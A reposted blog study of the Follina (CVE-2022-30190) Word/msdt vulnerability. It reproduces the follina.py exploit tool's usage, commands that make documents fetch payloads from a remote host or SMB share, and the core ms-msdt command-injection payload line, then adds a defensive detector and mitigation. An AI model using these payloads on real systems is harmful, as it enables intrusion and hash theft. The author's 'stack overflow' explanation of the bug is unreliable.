CVE-2022-30190 Vulnerability Study (Part 1)

admin | 2022-06-06 08:57:29 | 176 views | 4851 characters | 16 min 10 s read

    When I saw this vulnerability I was genuinely impressed. Previously, "phishing" required finding a way around Office macros, which was quite difficult; with this vulnerability that is no longer necessary. It is an absolutely revolutionary "breakthrough", and extremely dangerous. The two Office analyses I wrote earlier both assumed that macros were "allowed through"; to know the enemy as well as myself, there was no reason not to take a look, so I wanted to understand it and clear up the "confusion" in my mind.


    Someone has summarized this vulnerability; the essence is: a malicious Word document uses the remote template feature to fetch an HTML file from a remote server. The HTML code then uses Microsoft's MS-MSDT URI protocol to execute PowerShell code.


I. Process

  Someone has published an exploit payload online: https://github.com/chvancooten/follina.py


1. Help:

$ python .\follina.py -h

usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -t {rtf,docx}, --type {rtf,docx}
                        The type of payload to use, can be "docx" or "rtf"
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80



2. Usage:

# Execute a local binary
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080


3. Reproduction and analysis:

python follina.py -t docx -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

This generates clickme.docx and www\exploit.html in the current directory and starts the listener. With the tooling set up, we first open the generated clickme.docx to see what happens.

When Word starts, we capture the text "Opening http://localhost:8080/exploit.html", which shows that Word is contacting the server.


Next, look at the process monitor:

We see that the docx document launched Word;

We see that Word launched the msdt command line;

msdt is the Microsoft Support Diagnostic Tool (msdt.exe).

At the same time, sdiagnhost.exe launched calc.exe.

During this process, conhost.exe was also started;

Finally, this forms the chain docx -> msdt -> calc:

So the overall flow chart is as follows:


Finally, we walk through the process using the logs:


There is a problem here:

(1) Opening http://localhost:8080/exploit.html brings up the following:

[screenshot]

After opening it, the figure below appears; what is the key in it? I searched for a long time and could not find it, so I did not go further.

[screenshot]

From the process above, the docx successfully pops up the calc calculator when opened, without going through macros at all.


II. msdt parameters

Syntax

msdt </id <name> | /path <name> | /cab < name>> <</parameter> [options] … <parameter> [options]>>

Parameters

/id <packagename>: Specifies which diagnostic package to run. For a list of available packages, see Available Troubleshooting packs.
/path <directory|.diagpkg file|.diagcfg file>: Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameters.
/dci <passkey>: Prepopulates the passkey field. This parameter is only used when a support provider has supplied a passkey.
/dt <directory>: Displays the troubleshooting history in the specified directory. Diagnostic results are stored in the user's %LOCALAPPDATA%\Diagnostics or %LOCALAPPDATA%\ElevatedDiagnostics directories.
/af <answerfile>: Specifies an answer file in XML format that contains responses to one or more diagnostic interactions.
/modal <ownerHWND>: Makes the troubleshooting pack modal to a window designated by the parent Console Window Handle (HWND), in decimal. This parameter is typically used by applications that launch a troubleshooting pack. For more information about obtaining Console Window Handles, see How to Obtain a Console Window Handle (HWND).
/moreoptions <true|false>: Enables (true) or suppresses (false) the final troubleshooting screen that asks if the user wants to explore additional options. This parameter is typically used when the troubleshooting pack is launched by a troubleshooter that isn't part of the operating system.
/param <parameters>: Specifies a set of interaction responses at the command line, similar to an answer file. This parameter isn't typically used within the context of troubleshooting packs created with TSP Designer. For more information about developing custom parameters, see Windows Troubleshooting Platform. ==> specifies a set of interaction responses on the command line... the key point: developing custom parameters!!!
/advanced: Expands the advanced link on the Welcome page by default when the troubleshooting pack is started.
/custom: Prompts the user to confirm each possible resolution before it is applied.

Since these are custom parameters, it is easy to see why the vulnerability arises; it should be a stack overflow at the lower level.


III. Source code

1. Look at the generated clickme.docx

The location of the link is found inside the file;

Here there are two templates;


2. Python source

Two modes;

3. Core code:

Core: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\windows\system32\calc)/.exe\"";

It can also be executed directly from the command line: msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"
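As an added defender-side example (not code from the original post or from the follina.py project), the Python below parses the ms-msdt: /param string from the core code above and checks constructed Sysmon-style process-creation events for the docx -> Word -> msdt -> sdiagnhost -> calc chain observed in section I. The event fields, file paths and the benign troubleshooter event are assumptions.

```python
import re
# Constructed Sysmon-style process-creation events (not real telemetry),
# modelled on the docx -> WINWORD -> msdt -> sdiagnhost -> calc chain.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force '
                r'/param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
                r'IT_BrowseForFile=/../../$(calc)/.exe"'},
    {"parent": r"C:\Windows\System32\sdiagnhost.exe",
     "image": r"C:\Windows\System32\calc.exe",
     "cmdline": "calc.exe"},
    # Benign (assumed): a user launching a troubleshooter from Explorer.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" /id NetworkDiagnosticsWeb'},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PARAM_RE = re.compile(r'/param\s+"([^"]*)"', re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_msdt_params(cmdline):
    """Key=value pairs inside msdt's /param "..." argument ({} if absent)."""
    m = PARAM_RE.search(cmdline)
    return dict(tok.partition("=")[::2] for tok in m.group(1).split()) if m else {}

def msdt_param_injected(cmdline):
    """A $(...) substitution in IT_BrowseForFile is the injection point: the
    troubleshooter's PowerShell evaluates it, which is why sdiagnhost.exe
    (not msdt.exe) spawned calc.exe in the process monitor above."""
    return "$(" in parse_msdt_params(cmdline).get("IT_BrowseForFile", "")

def classify(event):
    """Reasons an event looks like Follina-style abuse; [] when benign."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    reasons = []
    if image == "msdt.exe" and parent in OFFICE_APPS:
        reasons.append("office-app-spawned-msdt")
    if "ms-msdt:" in cmd.lower() and msdt_param_injected(cmd):
        reasons.append("msdt-param-injection")
    if parent == "sdiagnhost.exe" and image != "conhost.exe":
        reasons.append("sdiagnhost-spawned-child")
    return reasons
```

Microsoft's published workaround for this CVE was to disable the ms-msdt URI protocol handler by removing its registry key (after exporting it as a backup), which breaks the location.href trigger shown above.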


I will continue studying this when I have time.

Originally published on the WeChat official account MicroPest: CVE-2022-30190 Vulnerability Study (Part 1)

Published by admin on 2022-06-06 08:57:29. Please keep this link when reposting (CN-SEC Chinese site; thanks to the original author for their work): http://cn-sec.com/archives/1090522.html
